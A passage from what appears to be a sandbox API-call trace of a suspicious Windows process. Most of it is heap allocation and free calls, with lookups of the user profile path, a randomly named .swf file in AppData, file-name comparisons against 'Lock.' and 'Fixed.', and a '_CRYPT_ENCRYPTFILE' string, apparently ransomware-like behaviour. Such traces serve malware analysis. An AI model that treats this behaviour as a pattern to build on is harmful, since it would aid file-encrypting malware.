HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.582] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.582] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e564e0 [0226.583] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/BTjJSlc2bP-ki.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf", lpFilePart=0x8cf650*="BTjJSlc2bP-ki.swf") returned 0x31 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.583] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\btjjslc2bp-ki.swf")) returned 0xffffffff [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0226.583] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0226.583] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.583] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0226.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CTe6ly.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Te6ly.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e6ly.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6ly.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ly.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0226.584] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0226.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b08 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0226.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CTe6ly.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Te6ly.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e6ly.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6ly.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ly.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0226.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.586] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0226.586] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0226.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.586] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.587] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0226.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0226.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504e8 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0226.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0226.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0226.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0226.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 